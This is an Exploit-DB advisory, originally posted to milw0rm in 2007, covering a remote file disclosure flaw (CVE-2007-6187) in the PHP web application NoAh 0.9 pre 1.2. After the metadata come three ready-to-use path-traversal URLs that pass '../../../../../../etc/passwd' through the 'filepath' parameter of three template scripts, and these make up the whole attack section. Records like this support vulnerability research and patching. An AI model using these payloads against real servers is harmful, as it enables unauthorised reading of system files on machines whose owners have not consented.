NoAh 0.9 pre 1.2 - 'filepath' Remote File Disclosure
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-11-27
date_updated: 2016-10-20
verified: 1
codes: OSVDB-39684;CVE-2007-6187;OSVDB-39683;OSVDB-39682
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comnoah0.9_pre1.2.tar.gz
NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities
Script : http://sourceforge.net/project/showfiles.php?group_id=131995 /noah0.9_pre1.2.tar.gz/
Exploits :
/noah/modules/nosystem/templates/css_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/js_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/xml_file.php?filepath=../../../../../../etc/passwd
S.P Thanx To : Tryag.Com[Mahmood_ali] -- Asb-May.Net/bb[Mahmood_ali]
# milw0rm.com [2007-11-28]